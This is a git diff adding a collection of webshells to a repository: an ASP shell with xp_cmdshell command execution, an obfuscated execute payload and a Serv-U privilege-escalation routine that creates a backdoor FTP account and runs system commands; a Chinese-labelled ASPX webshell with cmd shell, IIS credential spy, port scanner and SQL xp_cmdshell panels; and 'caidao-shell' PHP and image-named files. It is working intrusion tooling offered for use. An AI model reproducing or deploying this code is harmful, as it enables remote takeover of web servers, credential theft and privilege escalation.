    ":j SI:SI="":If trim(request.form("MMD"))<>"" Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," "," "):strResult = Replace(strResult,"<","<"):strResult = Replace(strResult,">",">"):strResult = Replace(strResult,chr(13),"
    "):End if:set adoConn = Nothing:j request.form("MMD") & "
    "& strResult:end FuncTion:case "Alexa" +dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&"" +execute(king("`>kz/<>rz/<`&)`SNQKJXBU_NSINSU`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<`&)`UB`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<ͳϵ>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<`&)`UNBUUSZBNY_XB_NSATMG`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/< `&vgf&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<ʱ>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>dkgy/<>kz/<>rz/<>'9'=txsqc 'fgozeq'=tdqf 'ftrroi'=thnz zxhfo<>'bh1:ktrkgw'=tsnzl'________________'=txsqc 'zodwxl'=thnz zxhfo<>'bh1:ktrkgw'=tsnzl'`&)`NWWQ_VQZBV`(ltswqokqIktcktU.zltxjtN&`'=txsqc '60'=tmol 'ho'=tdqf 'zbtz'=thnz zxhfo<>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>'afqsw_'=ztukqz 'dkgyho'=tdqf 'hlq.ho/tktiv/wtv/ukg.sstilwtv//:hzzi'=fgozeq zlgh=rgiztd dkgy<>kz/<>rz/<`&)`STQG_NSINSU`(ltswqokqIktcktl.zltxjtk&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<Ϣż>'xftd'=kgsgeuw 'ktzfte'=fuosq '8'=fqhlsge '19'=ziuoti rz<>kz<>'ktzfte'=fuosq '1'=uforrqhsste '0'=ufoeqhlsste '1'=ktrkgw 'xftd'=kgsgeuw '%13'=izrov tswqz<>kw<`=CU")) +For i=0 To 18 +SI=SI&""&ObT(i,0)&""&ObT(i,1)&""&ObT(i,2)&"" +Next +j SI +Err.Clear +Function bytes2BSTR(vIn) +dim strReturn +dim i1,ThisCharCode,NextCharCode +strReturn = "" +For i1 = 1 To LenB(vIn) +ThisCharCode = AscB(MidB(vIn,i1,1)) +If ThisCharCode < &H80 Then +strReturn = strReturn & Chr(ThisCharCode) +Else +NextCharCode = AscB(MidB(vIn,i1+1,1)) +strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) +i1 = i1 + 1 +End If +Next +bytes2BSTR = strReturn + Err.Clear +End Function +Case "Servu" +SUaction=request("SUaction") +if not isnumeric(SUaction) then response.end +user = trim(request("u")) +pass = trim(request("p")) +port = trim(request("port")) +cmd = trim(request("c")) +f=trim(request("f")) +if f="" then +f=gpath() +else +f=left(f,2) +end if +ftpport = 65500 +timeout=3 +loginuser = "User " & user & vbCrLf +loginpass = "Pass " & pass & vbCrLf +deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf +mt = "SITE MAINTENANCE" & vbCrLf +newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf +newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _ + "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _ + "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _ + "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _ + "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _ + "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _ + "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf +quit = "QUIT" & vbCrLf +newuser=replace(newuser,"c:",f) +select case SUaction +case 1 +set a=Server.CreateObject("Microsoft.XMLHTTP") +a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", "" +a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit +set session("a")=a +j"
    " +j"" +j"" +j"" +j"" +j"" +j"
    " +j"" +case 2 +set b=Server.CreateObject("Microsoft.XMLHTTP") +b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", "" +b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit +set session("b")=b +j"
    " +j"" +j"" +j"" +j"" +j"" +j"
    " +j"" +case 3 +set c=Server.CreateObject("Microsoft.XMLHTTP") +a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", "" +a.send loginuser & loginpass & mt & deldomain & quit +set session("a")=a +j"
    Ȩ,ִ,ɹοƷ
    "&cmd&"

    " +j"" +j"
    " +case else +on error resume next +set a=session("a") +set b=session("b") +set c=session("c") +a.abort +Set a = Nothing +b.abort +Set b = Nothing +c.abort +Set c = Nothing +j"
    " +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j"" +j" " +j" " +j" " +j" " +j" " +j" " +j" " +j" " +j"
    Serv-U Ȩ by Sam
    û:
    ڣ
    ϵͳ·
    " +j"" +j"
    " +end select +function Gpath() +on error resume next +err.clear +set f=Server.CreateObject(CONST_FSO) +if err.number>0 then +gpath="c:" +exit function +end if +gpath=f.GetSpecialFolder(0) +gpath=lcase(left(gpath,2)) +set f=nothing +end function +case"MMD":MMD() +case"ReadREG":call ReadREG() +case"delpoint":call delpoint() +case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing +case"DownFile":DownFile FName:ShowErr() +case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing +case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing +case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing +case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing +case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing +case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing +case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing +case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing +case"UpFile":UpFile() +case"TSearch":TSearch() +case"pcanywhere4":pcanywhere4() +case"Cmd1Shell":Cmd1Shell() +case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL +case"Course":Course() +case"Alexa":Alexa() +case"suftp":suftp() +case"upload":upload() +case"radmin":radmin() +case"pcanywhere4":pcanywhere4() +case"goback":goback() +Case "ProFile":ProFile() +case"php":php() +case"apjdel":apjdel() +case"cmdx":cmdx() +case"aspx":aspx() +case"hiddenshell":hiddenshell() +case"ScanDriveForm" : ScanDriveForm +Case "CustomScanDriveForm":CustomScanDriveForm() +case"ScanDrive" : ScanDrive Request("Drive") +case"ScFolder" : ScFolder Request("Folder") + Case Else MainForm() +End Select +if Action<>"Servu" then ShowErr() +j""%> \ No newline at end of file diff --git a/aspx/icesword.aspx b/aspx/icesword.aspx new file mode 100644 index 0000000..36d793c --- /dev/null +++ b/aspx/icesword.aspx @@ -0,0 +1,2578 @@ +<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> +<%@ import Namespace="System.IO"%> +<%@ import Namespace="System.Diagnostics"%> +<%@ import Namespace="System.Data"%> +<%@ import Namespace="System.Management"%> +<%@ import Namespace="System.Data.OleDb"%> +<%@ import Namespace="Microsoft.Win32"%> +<%@ import Namespace="System.Net.Sockets" %> +<%@ import Namespace="System.Net" %> +<%@ import Namespace="System.Runtime.InteropServices"%> +<%@ import Namespace="System.DirectoryServices"%> +<%@ import Namespace="System.ServiceProcess"%> +<%@ import Namespace="System.Text.RegularExpressions"%> +<%@ Import Namespace="System.Threading"%> +<%@ Import Namespace="System.Data.SqlClient"%> +<%@ import Namespace="Microsoft.VisualBasic"%> +<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> +<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> +<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> +<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%> + + + + + +冰锋刺客 + + + + +
    +
    +Password: + +

    +

    +
    +
    + + + + + + + +
    ☆NFT小组
    + | | | | | | | | | | | | | +
    +
    +
    +
    +

    +<%--FileList--%> +
    + + + + + + +
    当前目录 : +
    + + + + 文件(夹)名最后修改时间大小操作 + +
    +
    +
    | 木马目录 | 新建目录 + | 木马自杀 +
    +
    +<%--FileEdit--%> +
    +

    当前文件(创建新的文件名和新文件)
    + DefaultUTF-8 +

    +

    文件内容
    + +

    +

    +
    +<%--CloneTime--%> +
    +

    修改文件

    +

    参考文件

    +

    +

    设置最后修改时间 »

    +

    当前文件

    +

    + +  + +  + +  + +

    +

    +创建时间 : + +最后修改时间 : + +最后访问时间 : + +

    +

    + +

    +
    +<%--IISSpy--%> +
    + + +IDIIS_USERIIS_PASSDomainPath + +
    +
    +<%--Process--%> +
    + + +IDProcessThreadCountPriorityAction + +
    +
    +<%--CmdShell--%> +
    +

    Cmd路径:
    + +

    + 语句:
    + +
    +
    +
    +<%--Services--%> +
    + + +IDNamePathStateStartMode + +
    +
    +<%--Sysinfo--%> +
    +
    +
      +

      +
      +
        +

        +
        +
          +
          +<%--UserInfo--%> +
          + + + +
          +
          +<%--SuExp--%> +
          + + + + + + + + + + + + +
          用户名 : 密码 : 端口 :
          CmdShell  : 
          +
          + + + + + + +
          +
          +
          +<%--Reg--%> +
          +

          注册表路径 :

          + + + +KeyValue + +
          +
          +<%--PortScan--%> +
          +

          +IP : 端口 : +

          +
          +
          +<%--DataBase--%> +
          +

          语句 : MSSQLACCESS

          +
          +
          +
          +Please select a database : +SQLExec : -- SQL Server Exec --Add xp_cmdshellAdd sp_oacreateAdd xp_cmdshell(SQL2005)Add sp_oacreate(SQL2005)Add makewebtask(SQL2005)Add openrowset/opendatasource(SQL2005)XP_cmdshell execXP_dirtreeSP_oamethod execSP_makewebtask make fileSandBoxLogBackupDatabaseBackup +
          +
          Run SQL
          +
          +
          +

          + +

          +
          +
          +
          +<%--PortMap--%> +
          + + + + + + + +
          本地Ip : 本地端口 : 远程Ip : 远端口程 :

          +<%--Search--%> +
          + + + + + + + + + + + + + + + + + + + + + +
          关键词 使用正则表达式
          替换 替换
          搜索文件类型文件名称文件内容
          路径
          +
          +
          + +File PathLast modifiedSize + +
          +
          +
          Copyright © 2009-2012 冰锋刺客 All Rights Reserved.
          +
          + + \ No newline at end of file diff --git a/caidao-shell/404.php b/caidao-shell/404.php new file mode 100644 index 0000000..9944670 --- /dev/null +++ b/caidao-shell/404.php @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/caidao-shell/aspx.jpg b/caidao-shell/aspx.jpg new file mode 100644 index 0000000000000000000000000000000000000000..b68fed95e9c8fa255d72e3f0b6ee1fb912e124e7 GIT binary patch literal 9976 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 \ No newline at end of file diff --git a/caidao-shell/fuck.php b/caidao-shell/fuck.php new file mode 100644 index 0000000..9944670 --- /dev/null +++ b/caidao-shell/fuck.php @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/caidao-shell/guo.php b/caidao-shell/guo.php new file mode 100644 index 0000000..4384162 --- /dev/null +++ b/caidao-shell/guo.php @@ -0,0 +1 @@ + \ No newline at 